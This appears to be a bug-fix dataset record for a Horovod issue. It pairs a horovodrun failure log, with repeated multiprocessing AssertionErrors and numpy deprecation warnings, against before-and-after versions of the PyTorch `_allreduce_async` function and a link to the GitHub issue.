d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:542: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_quint8 = np.dtype([("quint8", np.uint8, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:543: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint16 = np.dtype([("qint16", np.int16, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:544: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_quint16 = np.dtype([("quint16", np.uint16, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:545: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint32 = np.dtype([("qint32", np.int32, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:550: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || np_resource = np.dtype([("resource", np.ubyte, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Traceback (most recent call last):
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 73, in _target_fn
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext = importlib.import_module('.' + ext_base_name, 'horovod')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/importlib/__init__.py", line 126, in import_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || return _bootstrap._gcd_import(name[level:], package, level)
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 994, in _gcd_import
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 971, in _find_and_load
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap_external>", line 678, in exec_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/tensorflow/__init__.py", line 43, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || has_gpu = gpu_available('tensorflow')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 104, in gpu_available
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext_base_name, available_fn, 'running with GPU', verbose) or False
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 90, in _check_extension_lambda
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || p.start()
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/multiprocessing/process.py", line 103, in start
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || 'daemonic processes are not allowed to have children'
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || AssertionError: daemonic processes are not allowed to have children
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Extension tensorflow was NOT built with Gloo.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Checking whether extension torch was built with Gloo.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Traceback (most recent call last):
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 73, in _target_fn
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext = importlib.import_module('.' + ext_base_name, 'horovod')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/importlib/__init__.py", line 126, in import_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || return _bootstrap._gcd_import(name[level:], package, level)
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 994, in _gcd_import
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 971, in _find_and_load
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap_external>", line 678, in exec_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/torch/__init__.py", line 39, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || from horovod.torch.mpi_ops import allreduce, allreduce_async, allreduce_, allreduce_async_
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 80, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _has_gpu = gpu_available('torch')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 104, in gpu_available
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext_base_name, available_fn, 'running with GPU', verbose) or False
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 90, in _check_extension_lambda
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || p.start()
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/multiprocessing/process.py", line 103, in start
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || 'daemonic processes are not allowed to have children'
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || AssertionError: daemonic processes are not allowed to have children
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Extension torch was NOT built with Gloo.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Checking whether extension mxnet was built with Gloo.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Traceback (most recent call last):
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 73, in _target_fn
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext = importlib.import_module('.' + ext_base_name, 'horovod')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/importlib/__init__.py", line 126, in import_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || return _bootstrap._gcd_import(name[level:], package, level)
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 994, in _gcd_import
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 971, in _find_and_load
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap_external>", line 678, in exec_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/mxnet/__init__.py", line 23, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || __file__, 'mpi_lib')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 51, in check_extension
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || 'Horovod with %s=1 to debug the build error.' % (ext_name, ext_env_var))
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ImportError: Extension horovod.mxnet has not been built. If this is not expected, reinstall Horovod with HOROVOD_WITH_MXNET=1 to debug the build error.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Extension mxnet was NOT built with Gloo.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Traceback (most recent call last):
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/bin/horovodrun", line 21, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || run_commandline()
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/run/run.py", line 860, in run_commandline
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _run(args)
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/run/run.py", line 828, in _run
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _launch_job(args, remote_host_names, settings, common_intfs, command)
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/run/run.py", line 850, in _launch_job
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || elif gloo_built(verbose=(settings.verbose >= 2)):
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 124, in gloo_built
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || raise RuntimeError('Failed to determine if Gloo support has been built. '
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || RuntimeError: Failed to determine if Gloo support has been built. Run again with --verbose for more details.
|
AssertionError
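The power-of-two rank checks referenced above (check_num_rank_power_of_2) are not shown in this record; as a hedged sketch, the usual bit trick such a helper is commonly implemented with:

def is_power_of_2(n):
    # A positive power of two has exactly one bit set.
    return n > 0 and (n & (n - 1)) == 0

assert is_power_of_2(8) and not is_power_of_2(6)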
|
def _allreduce_async(tensor, output, name, op):
if tensor.dtype == torch.float16 and not _fp16_supported:
raise NotImplementedError(
"float16 allreduce is not supported for PyTorch version {} < 1.0.0".format(
torch.__version__
)
)
# Set the divisor for reduced gradients to average when necessary
if op == Average:
divisor = size()
elif op == Adasum:
if tensor.device.type != "cpu" and gpu_available("torch"):
if nccl_built():
if not is_homogeneous():
raise NotImplementedError(
"Running GPU Adasum on heterogeneous cluster is not supported yet."
)
elif not num_rank_is_power_2(int(size() / local_size())):
raise NotImplementedError(
"Running GPU Adasum with non-power of 2 nodes is not supported yet."
)
divisor = local_size()
else:
warnings.warn(
"Adasum reduction does not currently support GPU reduction using MPI. Tensors are "
"copied to CPU memory instead. To use Adasum for GPU reduction, please compile Horovod "
"with HOROVOD_GPU_ALLREDUCE=NCCL."
)
divisor = 1
else:
if not num_rank_is_power_2(size()):
raise NotImplementedError(
"Running Adasum with non-power of 2 ranks is not supported yet."
)
divisor = 1
else:
divisor = 1
# Averaging happens in framework code, so translate that to Sum for the actual call
true_op = Sum if op == Average else op
function = _check_function(_allreduce_function_factory, tensor)
handle = getattr(mpi_lib, function)(
tensor, output, divisor, name.encode() if name is not None else _NULL, true_op
)
_handle_map[handle] = (tensor, output)
return handle
|
def _allreduce_async(tensor, output, name, op):
if tensor.dtype == torch.float16 and not _fp16_supported:
raise NotImplementedError(
"float16 allreduce is not supported for PyTorch version {} < 1.0.0".format(
torch.__version__
)
)
# Set the divisor for reduced gradients to average when necessary
if op == Average:
divisor = size()
elif op == Adasum:
if tensor.device.type != "cpu" and _has_gpu:
if nccl_built():
if not is_homogeneous():
raise NotImplementedError(
"Running GPU Adasum on heterogeneous cluster is not supported yet."
)
elif not num_rank_is_power_2(int(size() / local_size())):
raise NotImplementedError(
"Running GPU Adasum with non-power of 2 nodes is not supported yet."
)
divisor = local_size()
else:
warnings.warn(
"Adasum reduction does not currently support "
"GPU reduction using MPI. Tensors are copied to CPU memory instead."
"To use Adasum for GPU reduction, please compile Horovod with HOROVOD_GPU_ALLREDUCE=NCCL."
)
divisor = 1
else:
if not num_rank_is_power_2(size()):
raise NotImplementedError(
"Running Adasum with non-power of 2 ranks is not supported yet."
)
divisor = 1
else:
divisor = 1
# Averaging happens in framework code, so translate that to Sum for the actual call
true_op = Sum if op == Average else op
function = _check_function(_allreduce_function_factory, tensor)
handle = getattr(mpi_lib, function)(
tensor, output, divisor, name.encode() if name is not None else _NULL, true_op
)
_handle_map[handle] = (tensor, output)
return handle
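A distilled, standalone sketch of the divisor selection in _allreduce_async above, with the Horovod runtime queries (size(), local_size(), nccl_built(), GPU detection) replaced by plain parameters; the function and parameter names are illustrative:

def pick_divisor(op, size, local_size, gpu_adasum_with_nccl):
    if op == "Average":
        return size        # framework divides the summed tensor by world size
    if op == "Adasum" and gpu_adasum_with_nccl:
        return local_size  # GPU Adasum averages within each node
    return 1               # Sum, or the CPU/MPI Adasum fallback

assert pick_divisor("Average", 8, 4, False) == 8
assert pick_divisor("Adasum", 8, 4, True) == 4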
|
https://github.com/horovod/horovod/issues/1568
|
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Checking whether extension tensorflow was built with MPI.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:516: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint8 = np.dtype([("qint8", np.int8, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:517: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_quint8 = np.dtype([("quint8", np.uint8, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:518: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint16 = np.dtype([("qint16", np.int16, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:519: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_quint16 = np.dtype([("quint16", np.uint16, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:520: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint32 = np.dtype([("qint32", np.int32, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:525: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || np_resource = np.dtype([("resource", np.ubyte, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:541: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint8 = np.dtype([("qint8", np.int8, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:542: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_quint8 = np.dtype([("quint8", np.uint8, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:543: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint16 = np.dtype([("qint16", np.int16, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:544: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_quint16 = np.dtype([("quint16", np.uint16, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:545: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint32 = np.dtype([("qint32", np.int32, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:550: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || np_resource = np.dtype([("resource", np.ubyte, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Traceback (most recent call last):
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 73, in _target_fn
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext = importlib.import_module('.' + ext_base_name, 'horovod')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/importlib/__init__.py", line 126, in import_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || return _bootstrap._gcd_import(name[level:], package, level)
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 994, in _gcd_import
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 971, in _find_and_load
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap_external>", line 678, in exec_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/tensorflow/__init__.py", line 43, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || has_gpu = gpu_available('tensorflow')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 104, in gpu_available
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext_base_name, available_fn, 'running with GPU', verbose) or False
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 90, in _check_extension_lambda
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || p.start()
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/multiprocessing/process.py", line 103, in start
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || 'daemonic processes are not allowed to have children'
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || AssertionError: daemonic processes are not allowed to have children
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Extension tensorflow was NOT built with MPI.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Checking whether extension torch was built with MPI.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Traceback (most recent call last):
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 73, in _target_fn
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext = importlib.import_module('.' + ext_base_name, 'horovod')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/importlib/__init__.py", line 126, in import_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || return _bootstrap._gcd_import(name[level:], package, level)
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 994, in _gcd_import
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 971, in _find_and_load
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap_external>", line 678, in exec_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/torch/__init__.py", line 39, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || from horovod.torch.mpi_ops import allreduce, allreduce_async, allreduce_, allreduce_async_
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 80, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _has_gpu = gpu_available('torch')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 104, in gpu_available
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext_base_name, available_fn, 'running with GPU', verbose) or False
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 90, in _check_extension_lambda
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || p.start()
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/multiprocessing/process.py", line 103, in start
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || 'daemonic processes are not allowed to have children'
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || AssertionError: daemonic processes are not allowed to have children
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Extension torch was NOT built with MPI.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Checking whether extension mxnet was built with MPI.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Traceback (most recent call last):
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 73, in _target_fn
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext = importlib.import_module('.' + ext_base_name, 'horovod')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/importlib/__init__.py", line 126, in import_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || return _bootstrap._gcd_import(name[level:], package, level)
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 994, in _gcd_import
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 971, in _find_and_load
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap_external>", line 678, in exec_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/mxnet/__init__.py", line 23, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || __file__, 'mpi_lib')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 51, in check_extension
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || 'Horovod with %s=1 to debug the build error.' % (ext_name, ext_env_var))
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Extension mxnet was NOT built with MPI.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ImportError: Extension horovod.mxnet has not been built. If this is not expected, reinstall Horovod with HOROVOD_WITH_MXNET=1 to debug the build error.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Checking whether extension tensorflow was built with Gloo.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:516: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint8 = np.dtype([("qint8", np.int8, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:517: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_quint8 = np.dtype([("quint8", np.uint8, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:518: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint16 = np.dtype([("qint16", np.int16, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:519: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_quint16 = np.dtype([("quint16", np.uint16, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:520: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint32 = np.dtype([("qint32", np.int32, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:525: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
